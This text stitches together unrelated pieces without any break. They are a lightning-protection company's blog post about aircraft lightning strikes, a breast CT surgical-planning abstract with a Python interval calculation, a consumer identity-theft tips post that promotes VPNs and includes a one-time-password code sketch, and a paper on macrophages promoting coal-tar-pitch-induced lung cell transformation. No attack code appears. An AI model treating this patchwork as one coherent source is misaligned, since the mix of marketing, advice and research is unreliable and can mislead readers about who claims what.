By: JoOnna Silberman, LightningDiva@Large It's been said that traveling in an airplane is much safer than driving in a car, but that doesn't mean aircraft are not susceptible to damage from electrostatic charges. Lightning does strike aircraft, sometimes leaving them damaged externally and internally. Just recently, minutes before completing a 10+ hour trek from Tokyo, a plane landing at its final destination in Los Angeles (LAX) was struck by lightning. A heavy thunderstorm over Southern California apparently generated the lightning strike on the Delta Air Lines Airbus A330-200. The spokesman for Delta told the LA Times that the passengers neither reported feeling lightning hit the plane nor asked whether it had occurred. He went on to say that "lightning strikes to planes are rare." The spokesman could not have been more wrong. Lightning strikes to airplanes are very common; on average, every airliner is struck by lightning once a year. Although airplanes can be struck by lightning at any altitude or temperature, research shows that the higher the altitude, the more susceptible a plane is to lightning. It is also interesting to note that 57 percent of the mishaps attributed to lightning strikes on aircraft occur during the months of March through July. In 1962, lightning hit a Pan American Boeing 707 in a holding pattern over Elkton, Maryland. The lightning caused a spark that ignited fuel vapor in a tank, causing an explosion that brought the plane down, killing all 81 aboard. This led to regulations requiring that airplanes have built-in systems to ensure that a spark will not ignite fuel or fuel vapors in tanks or fuel lines. In the 1980s, NASA completed a research project by flying an F-106B jet into 1,154 thunderstorms. It was confirmed that lightning struck the jet 637 times.
Although the lightning did not directly damage the plane, it induced small electrical currents that could damage electronic systems. This led to regulations requiring that aircraft electrical and electronic systems, as well as fuel tanks and lines, have built-in lightning protection. These two instances prove that lightning can cause both direct and indirect effects on airplanes. Direct effects occur when a lightning strike attaches to the aircraft itself. This can cause extreme heating, which results in melting or burning damage. If lightning were to strike the fuel tank, an explosion or fire could occur. Indirect effects are caused by transient electrical pulses produced by the changing electric and magnetic fields of the lightning current. These indirect effects can damage avionics and other systems of the plane. Just like on the ground, lightning poses a serious threat and must be protected against. That is why Lightning Eliminators & Consultants (LEC) is dedicated to providing integrated lightning protection and lightning prevention products, solutions and services by utilizing innovative patented charge transfer technology, grounding systems engineering and testing, and surge protection design. Providing comprehensive design, services and consulting based on state-of-the-art engineering principles and physics, LEC has successfully installed and maintained lightning protection systems (LPS) in over 60 countries and throughout the United States for over 40 years.
Evaluation of the Usefulness of Breast CT Imaging in Delineating Tumor Extent and Guiding Surgical Management: A Prospective Multi-Institutional Study Objective: The aim of the present study was to evaluate the usefulness of computed tomographic (CT) imaging in delineating tumor extent and guiding surgical management. Background: The routine use of preoperative magnetic resonance imaging (MRI) is a controversial issue in breast cancer management. Negative studies with regard to the utility of MRI might be due to differences in positioning during imaging and subsequent surgery. Methods: Candidates for breast-conserving surgery were eligible for the study. The surgeons marked the line of planned excision on the skin, which was also recorded on the CT image. Contrast-enhanced breast CT was performed in the supine surgical position. The CT results were used to help determine the extent of resection. The pathological findings were then compared with the CT-guided surgical plans. Results: A total of 297 patients were involved. The surgeons widened the extent of resection in 42 (14.1%, 95% confidence interval 10.1%–18.1%) patients on the basis of the CT findings. Among the 6 patients whose procedures were changed to mastectomy, 4 had pathologically multicentric tumors and 2 had widely spread intraductal components. The remaining 36 patients underwent quadrantectomy instead of wide excision on the basis of the CT images. There were 3 patients in whom conversion from wide excision to quadrantectomy resulted in overexcision. Preoperative breast CT may have reduced the positive margin rate and also correctly changed the extent of surgery in 13.1% of patients. Conclusions: This prospective study suggests that breast CT, carried out in the supine position, is useful in the preoperative determination of the optimal surgical procedure.
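The abstract's headline figure of 14.1% (95% CI 10.1%–18.1%) is a simple binomial proportion. A quick normal-approximation (Wald) sketch in Python reproduces it to within rounding; the authors may have used a slightly different interval method:

```python
import math

# Patients whose extent of resection was widened, out of all enrolled
# (numbers taken from the abstract)
changed, total = 42, 297
p = changed / total  # proportion, about 0.141

# 95% confidence interval via the normal (Wald) approximation
se = math.sqrt(p * (1 - p) / total)
lo, hi = p - 1.96 * se, p + 1.96 * se
print(f"{p:.1%} (95% CI {lo:.1%}-{hi:.1%})")
```

The result is about 14.1% with an interval of roughly 10.2%–18.1%, matching the reported values up to rounding.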
The present age is the age of technology, and life without it is hard to imagine. Can you imagine your life without a computer or smartphone? The answer, of course, is no. In present times, most of your work is done with the help of computers or smart devices, and while carrying out your day-to-day activities you often need to provide your personal information online. Human life has become dependent on technology, so security is very important. Whenever you create an account online or carry out a transaction, you make use of a password, and you make your best effort to keep that password secure. But what if someone hacks your computer or devices, looks through all your valuables, and steals everything precious you have? Hackers can crack your password. They can use your valuable data for unethical and illegal activities. They are not people to trust. The Internet is useful, but it is not completely safe. Why? Because a careless click on the Internet can make you a victim of online identity theft. Not familiar with online identity theft? What is Online Identity Theft? Identity theft is a form of crime in which hackers and identity snoopers impersonate other individuals, using their personal and financial details to execute fraudulent activities. Online identity theft is among the most commonly recorded crimes across the world, and hundreds of thousands of people become its victims. The word 'online' makes clear that this form of crime is committed through PCs and other Internet-connected devices.
Following are some of the most common forms of online identity theft recorded during 2015: stealing your name, email address, and postal address; snatching your passport and driving license details; stealing your login details to get access to private files; and stealing bank and other financial details. All-in-One Identity Theft Solution We are going to discuss in this post several ways to combat cyber attacks. However, the best solution we have tested and experienced is to use a VPN. Why? Because it is a one-stop solution that protects you from many online threats at once. Below are the best VPN providers that we recommend. How to protect yourself against identity theft It is necessary to ensure your privacy is not breached. It is your right to protect your online identity from any data or financial loss. To protect your identity online, follow these steps to keep your personal information safe and secure: 1) Click only when you are sure Do not click on any unfamiliar link while you are online. Luring you into clicking such links is one of the most common ways hackers infect your computer with malware. If you open such links, it is easy for hackers to steal your personal information. 2) Personal means private, don't expose it While using any social networking site, make sure that you do not share your personal information with any stranger. A stranger with whom you share your personal information may hack your accounts using the information you provide. This is one of the best proven methods of keeping your personal identity safe online. 3) Use different passwords Do not reuse the password of your main email account. If a hacker cracks the password of your main email account, it is easier for him to reset the passwords of the other accounts you use. In this way the hacker gets details of your personal information, such as your banking or passport details and your date of birth, which makes misusing the information easy. 4) Install the best antivirus software on your PC Antivirus software protects your PC from malware.
It detects viruses long before you would notice them and hence protects your data from malicious activity. 5) Install applications like Find My iPhone, BlackBerry Protect, or Android Lost on your mobile phone Installing these applications on your mobile phone lets you remotely erase the passwords and personal data stored on your device. This proves very useful if your mobile phone is stolen or lost. 6) Shop online through secure sites only Always remember to shop online through a secure website. How do you know whether a site is secure? Once you reach the retailer's login page, check that the address begins with "https" rather than "http"; the "https" prefix indicates that your connection is encrypted. If the address still shows "http" after you log in, your connection is not secure. Also make sure that you see the unbroken key or padlock icon in your browser. 7) It is better to ignore pop-ups Ignore pop-ups as much as possible, because they may carry malicious software. If you click on such a pop-up, malware may install itself on your PC, posing a threat to your online identity. 8) Avoid using public Wi-Fi Using public Wi-Fi is never fully safe. Trustworthy Wi-Fi hotspots encrypt your data; a public hotspot that does not encrypt data may well be a hacker's trap. Never send your passwords over such Wi-Fi connections. 9) Use multiple email accounts It is better to use separate email accounts for social networking, banking and other financial transactions, shopping, and other tasks. This helps you to identify malicious emails and spam. For example: if you receive a mail about banking in your social-networking email account, it is spam. Ignore such emails. 10) Never store your credit card details online Breaching online data security is not an easy task, but taking the risk is never advisable. Do not share your credit card details on sites that are not secure.
It is advisable to make use of disposable credit cards, as this reduces the risk of online fraud. 11) Use two-step verification Make sure that you enable two-step verification for your accounts. This helps keep your data secure, and no one gets access to any of your accounts without permission. When someone tries to log into your account, a verification code is sent to you through SMS, and only after the correct code is entered does the account open. 12) Be vigilant while using auction sites While using auction sites, always check the seller's feedback before making a deal. Also secure your accounts by changing your passwords regularly. This reduces the risk of potential fraud. 13) Always lock your phone or tablet Always keep the data on your phone secured with a password. New-generation devices offer fingerprint technology, which helps secure your data as well as the accounts you use. 14) Be cautious while erasing private data Deleting data from your computer is no guarantee that it cannot be recovered. Recovery software can restore data you have deleted, so to make sure that no recovery is possible, use software made specifically for secure erasure. 15) Human error is the root of online threats Hackers find it easy to compromise your computer, tablet or mobile phone if you are careless. Some hackers ask for private information in an unsuspecting manner; others use various tricks to get at your personal information. Always be vigilant while sharing your information online; it may be a hacker's trap. 16) Always use a VPN Of all the steps we discussed to protect your online identity, this one is our favorite: use a VPN! It helps in so many different ways. From giving access to geo-restricted websites to saving you from online identity theft, a VPN covers it all. Prevention is always better than cure, so be vigilant while using the Internet.
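As a small programmatic companion to point 6, a URL's scheme can be checked before anything sensitive is submitted. A minimal sketch in Python; the URLs are made-up examples, not real shops:

```python
from urllib.parse import urlparse

def is_secure_checkout(url: str) -> bool:
    """Return True only if the page is served over HTTPS."""
    return urlparse(url).scheme == "https"

# Hypothetical example URLs
print(is_secure_checkout("https://shop.example.com/checkout"))  # True
print(is_secure_checkout("http://shop.example.com/checkout"))   # False
```

The same one-line check is what the browser's padlock indicator performs for you automatically.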
No doubt, cyber laws are quite strong and online data-security software is readily available, but you should still take precautions when going online. The points given above do not provide a complete solution, but they help reduce online risks to some extent. Above all, your personal identity stays secure if you take proper care while going online.
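The verification codes described in point 11 are commonly generated with the time-based one-time password (TOTP) scheme standardized in RFC 6238. A minimal sketch using only the Python standard library; the Base32 secret below is a placeholder, not a real credential:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password (HMAC-SHA-1)."""
    key = base64.b32decode(secret_b32)
    # The moving factor is the number of 30-second intervals since the epoch
    counter = struct.pack(">Q", int(time.time()) // step)
    digest = hmac.new(key, counter, "sha1").digest()
    # Dynamic truncation (RFC 4226): pick 4 bytes at an offset from the digest
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # a 6-digit code that changes every 30 s
```

Because the code depends on the current time and a shared secret, an attacker who steals only your password still cannot log in.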
Macrophages Facilitate Coal Tar Pitch Extract-Induced Tumorigenic Transformation of Human Bronchial Epithelial Cells Mediated by NF-κB Objective Chronic respiratory inflammation has been associated with lung cancer. Tumor-associated macrophages (TAMs) play a critical role in the formation of the inflammatory microenvironment. We sought to characterize the role of TAMs in coal tar pitch extract (CTPE)-induced tumorigenic transformation of human bronchial epithelial cells and the underlying mechanisms. Methods The expression of the TAM-specific marker CD68 in lung cancer tissues and paired adjacent tissues from cancer patients was determined using immunostaining. Co-culture of human bronchial epithelial cells (BEAS-2B) and macrophage-like THP-1 cells was conducted to evaluate the promotive effect of macrophages on CTPE-induced tumorigenic transformation of BEAS-2B cells. BEAS-2B cells were first treated with 2.4 µg/mL CTPE for 72 hours. After removal of CTPE, the cells were continuously cultured either with or without THP-1 cells and passaged using trypsin-EDTA. Alterations of cell cycle, karyotype, colony formation in soft agar and tumor xenograft growth in nude mice of BEAS-2B cells at passages 10, 20 and 30, indicative of tumorigenicity, were determined, respectively. In addition, mRNA and protein levels of NF-κB in BEAS-2B cells were measured with RT-PCR and western blot, respectively. B(a)P was used as the positive control. Results Over-expression of TAM-specific CD68 around lung tumor tissues was detected and was associated with lung cancer progression. Tumorigenic alterations of BEAS-2B cells, including increases in cell growth rate, number of cells with aneuploidy, clonogenicity in soft agar, and tumor size in nude mice in vivo, occurred at passage 10 and became significant at passages 20 and 30 of the co-culture following CTPE removal, compared with BEAS-2B cells alone.
In addition, the expression levels of NF-κB in BEAS-2B cells were positively correlated with the malignancy of BEAS-2B cells under the different treatment conditions. Conclusion The presence of macrophages facilitated CTPE-induced tumorigenic transformation of BEAS-2B cells, which may be mediated by NF-κB. Introduction Lung cancer is the leading cause of cancer mortality worldwide, with 1.2 million deaths each year, and 1.3 million new cases are diagnosed every year in the world. In China, it is predicted from current epidemiological data that 10 million people may be diagnosed with lung cancer in 2025. However, the overall 5-year survival rate for lung cancer patients is still less than 15%, and has remained largely stable for the last three decades. Lung carcinogenesis is a complex process, and elucidation of the molecular mechanisms involved in the pathogenesis of lung cancer is expected to help develop novel diagnostic and therapeutic strategies against lung cancer. In 1863 Rudolf Virchow first reported the association of inflammation with cancer. Since then, cancer-related inflammation has come to be regarded as a hallmark of carcinogenesis. It has been proposed that tumors can be considered as wounds that do not heal because of permanent inflammatory infiltration. Increasing epidemiological evidence has demonstrated that chronic inflammation may play a critical role in lung carcinogenesis. Individuals with chronic inflammatory respiratory diseases, such as chronic obstructive pulmonary disease resulting from smoking exposure and chronic hypersensitivity pneumonitis, are at higher risk for subsequent development of lung cancer. Furthermore, the regular use of aspirin and other non-steroidal anti-inflammatory drugs can reduce the risk of lung cancer, not only in animals but also in humans. However, the mechanisms of inflammation-promoted initiation of lung cancer are not fully understood.
Emerging evidence shows that tumor-associated macrophages (TAMs), derived from circulating monocytic precursors, form a major component of the tumor microenvironment. TAM infiltration has been found in many malignant cancers, such as cervical cancer, colorectal cancer, anaplastic thyroid carcinoma, breast cancer, and lung cancer, and contributes to angiogenesis, lymphangiogenesis, invasion and metastasis. TAMs represent a first line of cells in promoting tumor development because they can release pro-inflammatory cytokines and shape the tumor microenvironment, which may support tumor growth and help the tumor evade immunosurveillance. So far, however, no evidence has been reported on the role of TAMs in the initiation of lung tumors. Coal tar pitch (CTP), the by-product of incomplete burning and distillation of coal tar, is used broadly for producing carbon electrode adhesives, waterproofing, anti-corrosion coatings and road-construction materials. On a daily basis, people are exposed to CTP fume. Many studies have evaluated the carcinogenic potential of CTP and established it as a selective inducer of lung cancer. Weyand and coworkers reported a high lung cancer incidence in female A/J mice following 260 days of CTP administration in the diet. Koganti et al. found that an adduct was detected in rat lungs 24 hours after administration of dimethylsulfoxide (DMSO)-extracted coal tar pitch by i.p. injection for 3 days. In a previous study we showed that tracheal instillation of 200 µL of CTP into rat lungs 8 times at a concentration of 160 mg/mL induced lung cancer. CTP is a recognized carcinogen, and CTP-induced lung cancer is one of the serious occupational disorders. Given the long latent period, CTP-induced lung cancer may serve as an excellent model for studying the mechanisms of carcinogenesis.
In this study, human bronchial epithelial cells (BEAS-2B) were utilized as the in vitro model to explore the relationship between inflammation and the tumorigenicity induced by coal tar pitch extract. The reason for using bronchial epithelial cells was mainly the fact that most lung cancers originate histologically from bronchial epithelial cells. Coal tar pitch extract (CTPE)-treated BEAS-2B cells were cultured in the presence or absence of macrophage-like THP-1 cells. Materials and Methods Preparation of Coal Tar Pitch Extract (CTPE) CTPE was collected as described previously. Briefly, moderate-temperature CTP was ground into powder in an agate bowl, sieved through 200-mesh sieves and heated at 400 °C on an electric hot plate in a flow hood. CTP fume was collected on cellulose ester membranes with 0.8 µm pore size using a regular dust sampler and a respiratory dust sampler; particles from 0.8 µm to 2.5 µm in diameter were collected. Sampling duration was 100 min at a flow of 10 L/min. After sampling, the filter membranes were cut into pieces, put into a stoppered flask and dissolved in 50 mL of acetidin (ethyl acetate, spectroscopically pure); the solution was then vibrated ultrasonically for 40 min and filtered through a sand core funnel to obtain the supernatant. Finally, a beaker with the supernatant was placed in a 45 °C drying oven, and when the liquid had evaporated completely, DMSO (spectroscopically pure) was added to obtain the extract solution. The stock concentration of CTP extract was 2 mg/mL. Cell Lines, Cell Culture and Tissue Specimens Human bronchial epithelial cell line (BEAS-2B): The BEAS-2B cell line (subclone S6) was obtained from Drs. Curtis Harris and John Lechner (USA National Institutes of Health). It was derived by transforming human bronchial epithelial cells with an adenovirus 12-simian virus 40 construct. The human macrophage-like cell line THP-1 was purchased from ATCC (Rockville, USA).
The two cell lines were cultured in RPMI 1640 medium with 10% (v:v) fetal bovine serum (FBS), 100 IU/mL of penicillin and 100 µg/mL of streptomycin. All cells were cultured at 37 °C in a 5% CO2 incubator. 67 pairs of paraffin-embedded primary lung cancer, adjacent tumor tissue and surrounding non-tumor lung tissues were collected from patients with lung cancer at the First Affiliated Hospital of Zhengzhou University (Henan, China). Written informed consent was obtained from all 67 subjects. The Life Sciences Institutional Review Board of Zhengzhou University approved the consent procedure. Immunohistochemistry (IHC) Briefly, specimens were deparaffinized, blocked with goat serum for 30 min, and incubated with mouse anti-human CD68 monoclonal antibody (Santa Cruz, 1:10 dilution) overnight at 4 °C, then incubated with biotinylated rabbit anti-mouse immunoglobulin at a dilution of 1:100 at 37 °C for 30 min. Positive CD68 IHC expression appeared as brown staining in the cytoplasm and was estimated by averaging the number of positively staining cells over 10 high-power fields. Determination of CTPE Half Maximal Inhibitory Concentration (IC50) BEAS-2B cells were placed into 24-well plates at a density of 1×10⁴ per well and treated with vehicle control (DMSO) or 1, 2.5, 5, 10, 20, 40 and 80 µg/mL of CTPE for 24 h. Cell viability was then determined using the trypan blue dye exclusion assay. The experiment was repeated three times. The half maximal inhibitory concentration (IC50) was calculated using Probit regression and was 8.11 µg/mL. CTPE Treatment of Co-culture of BEAS-2B and THP-1 Cells BEAS-2B cells were treated with 2.4 µg/mL CTPE (30% of the IC50) for 72 h as follows: BEAS-2B cells grown to 70%-80% confluence were treated with CTPE solution for 24 h. After removal of CTPE, the cells were washed with cold PBS and passaged using trypsin-EDTA; the BEAS-2B cells underwent the same procedure another two times, for a total of 72 h.
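The Probit-regression IC50 estimate described above can be sketched as follows: convert each fraction of affected cells to probit units, fit a straight line against log10 concentration, and solve for the concentration at probit 0 (the 50% effect point). The dose-response values below are synthetic placeholders generated around an assumed IC50 of 8 µg/mL, not the study's measurements:

```python
import numpy as np
from scipy.stats import norm

# Synthetic dose-response data (NOT the study's measurements):
# fraction of cells affected at each CTPE concentration (µg/mL)
conc = np.array([1, 2.5, 5, 10, 20, 40, 80], dtype=float)
true_ic50 = 8.0  # assumed for this illustration
affected = norm.cdf((np.log10(conc) - np.log10(true_ic50)) / 0.5)

# Probit regression: probit(affected) is linear in log10(concentration)
probits = norm.ppf(affected)
slope, intercept = np.polyfit(np.log10(conc), probits, 1)

# IC50 is the concentration where the fitted probit equals 0 (50% affected)
ic50 = 10 ** (-intercept / slope)
print(round(ic50, 2))
```

With noiseless data the fit recovers the assumed IC50 exactly; with real viability counts the same transform-and-fit procedure yields the reported estimate.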
Then, CTPE-treated BEAS-2B cells were co-cultured with THP-1 cells at a ratio of 10:1 (BEAS-2B cells/THP-1 cells). B(a)P (5 µg/mL) was used as the positive control and 0.1% DMSO as vehicle control. For simplicity, the passage of BEAS-2B cells following CTPE treatment was numbered as passage 0. Examination of Cell Cycle with Flow Cytometry BEAS-2B cells at passages 10, 20 and 30 were fixed in 70% ethanol prior to propidium iodide staining. DNA content was evaluated by FACS flow cytometry (Shimadzu, Japan). Karyotyping BEAS-2B cells at passages 10, 20, and 30 in logarithmic phase were treated with 0.04 µg/mL colcemid for 3 h at 37 °C to arrest cells in metaphase. The cells were then trypsinized, centrifuged for 10 min at 1000 rpm, and the cell pellets resuspended in warmed (37 °C) KCl hypotonic solution and incubated for 40 min. The swollen cells were pelleted and resuspended in 8 mL of Carnoy's fixation solution (3:1 = methanol:glacial acetic acid) at room temperature for 2 h. The cell suspension was centrifuged and washed twice in fixation solution. After the last centrifugation, the cells were resuspended in 2 mL of freshly prepared fixation solution. Three drops of the final cell suspension were placed on clean slides and air-dried. Slides were stained with Giemsa solution (pH 6.8) for 30 min, washed with tap water for 5 seconds, and air-dried. One hundred cells in metaphase were examined for karyotype (chromosomal abnormality). Colony Formation in Soft Agar Colony formation in soft agar was assessed by growing 1×10⁴ BEAS-2B cells from passages 10, 20 and 30 in the upper layer (0.7% SeaPlaque) of a two-layer agar (0.7% and 1.2%) in a 6-cm dish. After 3 weeks, the number of colonies (a colony consisted of more than 50 cells) was counted, and clonogenicity (%) was calculated as number of colonies/total number of growing cells × 100%. RT-PCR Total RNA was isolated from BEAS-2B cells using an RNAeasy kit (Invitrogen, Carlsbad, CA, USA) following the manufacturer's protocol.
Samples were treated with DNase to remove DNA contamination (Ambion Inc., Austin, TX, USA). RNA samples were then reverse-transcribed into cDNA using SuperScript II RT (Invitrogen Corp., Carlsbad, CA, USA) following the manufacturer's instructions. Primers were designed using Primer 5.0 software and were produced by Shanghai Biological Engineering Company. The sequences are as follows: NF-κB forward: 5′-TGCCGAGTGAACCGAAAC-3′, reverse: 5′-TGGAGACACG-CACAGGAGC-3′. Gene expression values were normalized to the housekeeping gene GAPDH. The PCR reaction had a total volume of 100 µL containing 1.5 mM magnesium chloride (MgCl2), 200 µM deoxynucleoside triphosphates, 2.5 units Taq DNA polymerase, 20 picomoles of primer, and 100 ng cellular DNA template. A Taq PCR master mix kit was used for the PCR reactions (Shanghai Xinbainuo Bio. Co., Shanghai, China). The PCR reaction for NF-κB was performed under the following conditions: 95 °C for 2 min, then 29 cycles of 56 °C for 30 s and 72 °C for 45 s. For GAPDH, the conditions were 95 °C for 2 min, then 28 cycles of 59 °C for 1 min and 72 °C for 1 min. The two PCR products were mixed together and analyzed on 1.5% agarose gels in TBE buffer. The gels were observed and photographed using UV imaging equipment. The gray values were analyzed using Gelpro 3.5 software. Western Blotting BEAS-2B cells were lysed with lysis buffer (RIPA lysis buffer with proteinase inhibitors). The protein concentration of cell lysate supernatants was determined with the Bradford assay. 20 µg of protein was mixed with sample loading buffer and boiled for 5 min. Samples were separated by 10% SDS-PAGE and transferred onto PVDF membranes.
Immunoblots were blocked with 5% milk in TBS/0.1% Tween 20 for 1 h at room temperature, then incubated overnight at 4 °C with 1:500 rabbit polyclonal antibody against human NF-κB p65 (Santa Cruz) and 1:1000 rabbit polyclonal antibody to human β-actin (Cell Signaling) in 3% milk/TBS/0.1% Tween 20. 1:2000 goat anti-rabbit IgG (Santa Cruz Biotechnology) in 3% milk/TBS/0.1% Tween 20 was used as the secondary antibody to incubate the membranes at room temperature for 2 h. Proteins were detected with a DAB detection system (Zhongshan Golden Bridge Bio. Co., Beijing, China). The densitometry of the bands was analyzed using Gelpro 3.5 software. Statistics Data are expressed as mean ± SEM; GraphPad software (San Diego, CA) was used for statistical analysis. Significant differences among multiple groups with one variable were determined by one-way ANOVA, and pairs of groups were then compared using the Newman-Keuls test. The Student t test was used for comparisons between two groups. A two-tailed P value <0.05 was considered statistically significant. Expression of CD68 in Paired Lung Cancer, Adjacent Tumor Tissues and Surrounding Non-tumorous Lung Tissue from Patients CD68 is the specific surface marker of macrophages. As expected, CD68 was mainly detected in the cytoplasm of macrophages as brown staining (Figure 1). The number of cells with positive CD68 staining in tissue adjacent to lung cancer was 97.49 ± 2.54, which was higher than that in lung cancer tissues (11.78 ± 1.37) and non-tumorous lung tissues (52.14 ± 1.85), and the differences were significant (n = 67, P<0.05). Clinical Implication of CD68 Expression in Tissue Adjacent to Lung Cancer The correlation between high CD68 expression in tissue adjacent to lung cancer and clinicopathologic characteristics of lung cancer, including age, gender, differentiation of tumor cells, metastasis to lymph nodes, TNM stage and tumor invasion of the pleura, was studied (Table 1).
It was shown that the number of CD68 positively staining macrophages was closely associated with TNM stage (P = 0.001), metastasis to lymph nodes (P = 0.001) and tumor invasion of the pleura (P = 0.001). Tumorigenic Transformation of BEAS-2B Cells Treated with CTPE The tumorigenicity of BEAS-2B cells treated with DMSO, CTPE, B(a)P, or Co-culture/CTPE was evaluated through examination of cell cycle, karyotype and colony formation in soft agar at passages 10, 20 and 30. Tumorigenicity is characterized by growth promotion, which can be determined by analysis of the cell cycle with flow cytometry. As shown in Figure 2, the percentage of S-phase cells at passage 10 increased in the CTPE group and the Co-culture/CTPE group; at passage 20, the percentage of S-phase cells in the Co-culture/CTPE group was significantly higher than that of BEAS-2B cells alone exposed to CTPE or B(a)P. At passage 30, the percentage of S-phase cells in the Co-culture/CTPE group remained the highest among all groups. Aneuploidy, including hypodiploidy (<2n) and hyperdiploidy (>2n, <4n), is a common early feature of cancers and has been associated with tumorigenesis and tumor progression. As shown in Figure 3, the number of cells with aneuploidy per 100 BEAS-2B cells in the Co-culture/CTPE group at passage 10 was greater than that of the DMSO group, but not different from the CTPE group. At passages 20 and 30, the rates of aneuploidy per 100 BEAS-2B cells in the Co-culture/CTPE group were the highest among the four groups. The results from the soft agar assay demonstrated that the colony number and clonogenicity percentage of BEAS-2B cells (Figures 4-5) in the co-culture group were not increased at passage 10, but were significantly increased at passages 20 and 30 compared with those of the other three groups (P<0.05). Tumor Xenograft Growth in Nude Mice Tumor formation in nude mice reflects tumorigenicity in vivo (n = 6/group).
BEAS-2B cells without treatment were used as the negative control (blank); BEAS-2B cells treated with DMSO were used as the vehicle control. 30 days after cell transplantation, there was no tumor formation in the blank, DMSO, or CTPE group at passage 20; however, tumors were observed on the back of the neck of nude mice transplanted with CTPE-treated BEAS-2B cells of passage 30 (the first tumor was observed on the 15th day after transplantation) and with the mixture of CTPE-treated BEAS-2B cells at passage 30 and THP-1 cells (two tumors were observed on the 10th day after transplantation) (Figure 6). The tumor growth curve demonstrated that the average volume of tumors from CTPE-induced passage 30 BEAS-2B/THP-1 cells was increased compared with the same passage of BEAS-2B cells alone exposed to CTPE at the different observation time points (P<0.05) (Figure 7). Discussion Tumor-associated macrophages (TAMs), which have an M2 macrophage phenotype, are the most abundant immune cells in the tumor microenvironment and play a mostly pro-tumoral role. Increased TAMs are frequently, although not always, correlated with a bad prognosis, and there are reports demonstrating that infiltrating TAMs can promote cancer invasion and metastasis. TAMs infiltrating the breast tumor stroma, but not the tumor nest, are positively related to breast tumor metastasis; similarly, TAMs infiltrating the invasive front are associated with hepatic metastasis in colon cancer; and TAMs can provide a favorable microenvironment for non-small cell lung cancer invasion and progression. In this study, we observed that the expression levels of CD68+ TAMs were increased in tissue adjacent to lung tumors and correlated with lung cancer progression and metastasis, which is consistent with these observations. In addition, the following studies have also indicated a relationship between TAMs and carcinogenesis.
For example, TAM infiltration was found in a mouse model of pancreatic tumor carcinogenesis induced by expression of oncogenic KrasG12D. Infiltrating TAMs can produce a proliferation-inducing ligand (APRIL) upon direct stimulation with Helicobacter pylori (Hp) to promote the initiation of gastric lymphoma. To our knowledge, this study is the first of its kind to show that TAMs can promote lung carcinogenesis. The occurrence and development of cancer involves cell cycle disorganization, leading to uncontrolled cellular proliferation. Aneuploidy, a state of abnormal chromosome number, is a hallmark of human carcinogenesis, and emerging evidence suggests that aneuploidy is a driver of tumor initiation and growth. Loss of growth inhibition is one of the most important characteristics of malignant cells, manifested as spherical colonies in soft agar in vitro and neoplastic growth in nude mice in vivo. In this study, the tumorigenic potential of BEAS-2B cells with or without THP-1 co-culture following CTPE removal was demonstrated by in vitro and in vivo assays, and we identified that TAMs could effectively promote BEAS-2B cell growth, increase the number of aneuploid cells, and increase colony formation of BEAS-2B cells in vitro at the 20th and 30th passages. A recent study demonstrated that human alveolar macrophages can promote formation of bulky stable DNA adducts in human lung epithelial cells exposed to the polycyclic aromatic hydrocarbon (PAH) component of airborne particulate matter (PM2.5); the explanation could be that alveolar macrophages metabolize the PAHs of PM2.5 into highly reactive metabolites through induction of cytochrome P450 (CYP) 1A1 expression and CYP1A1 catalytic activity. Therefore, TAMs not only initiate tumorigenesis by inducing gene mutation and chromosomal rearrangement or amplification, but also shape the tumor microenvironment and exert their pro-tumoral role by affecting fundamental aspects of tumor biology.
For example, they can enhance angiogenesis and lymphangiogenesis, adjust innate and adaptive immunity, and catalyze structural changes of the extracellular matrix (ECM) compartment. In addition to the malignant transformation effect in vitro, THP-1 cells were also shown to enhance tumor formation in nude mice in vivo. The fact that THP-1 cells could not form colonies themselves suggests that these cells might promote permanent alterations of the physiologic and social behavior of BEAS-2B cells, leading to their insensitivity to growth inhibition by high cell density or low serum concentration. There was also a necrotic area on the surface of the tumor derived from the mixture of CTPE-treated BEAS-2B cells (passage 30) and THP-1 cells. It has been proposed that accumulation in necrotic regions of tumors is another prominent hallmark of TAMs, which may be regulated by hypoxia-inducible factor-1 (HIF-1). When inflammation meets cancer, NF-κB works as the matchmaker. NF-κB affects most of the processes of initiation of neoplasia and its malignant progression, through self-sufficiency in growth signals, insensitivity to growth-inhibitory signals, evasion of apoptosis, limitless replicative potential, tissue invasion and metastasis, and sustained angiogenesis. In a mouse model, Greten et al. specifically knocked out the IKK gene in intestinal epithelial cells to inactivate NF-κB and found that the incidence of colitis-associated colorectal cancer was reduced by 80%, suggesting that activation of NF-κB promotes the occurrence of colitis-associated colorectal cancer. In addition, there is evidence implicating NF-κB activation in pathogen-induced carcinogenesis: hepatitis B virus X protein induces hepatocellular carcinoma by activating NF-κB, and human papillomavirus (HPV) has been proposed to promote oral carcinogenesis through activating NF-κB.
Furthermore, KRAS mutation has been reported to mediate the initiation and promotion of endometrial cancer by inducing NF-κB activation. However, inconsistencies exist regarding the association between NF-κB activation and urethane-induced lung carcinogenesis. For example, one study demonstrated that epithelial NF-κB activation could promote the initiation of lung cancer by upregulating expression of the anti-apoptosis gene Bcl-2; another study revealed that short-term treatment with the NF-κB inhibitor bortezomib might promote lung carcinogenesis, and that prolonged NF-κB inhibition could enhance chemically induced initiation of lung cancer by increasing expression of inflammatory cytokines/chemokines such as interleukin-1β, CXCL1 and CXCL2. We showed here that the increase in NF-κB gene transcription paralleled its protein levels in BEAS-2B cells co-cultured with THP-1 cells at passages 20 and 30, which was associated with genomic instability and increases in cell growth and colony formation. Thus, we speculated that there must be a close relationship between activation of NF-κB in malignant cells and lung cancer initiation. To verify this hypothesis, we tested the involvement of NF-κB in this study and found that CTPE could activate NF-κB, and that THP-1 cells could further promote NF-κB activity. A possible explanation is that TAMs release pro-inflammatory cytokines and participate in the formation of the tumor microenvironment. For example, TNF-α and IL-1β secreted by macrophages are not only essential in the initiation of chronic inflammation, but are also associated with the initiation of cancer through activation of the NF-κB signaling pathway. Activation of NF-κB in tumor cells can produce ROS that further induce DNA damage and genomic instability, leading to the activation of pro-tumorigenic transcription factors such as STAT3 and AP-1.
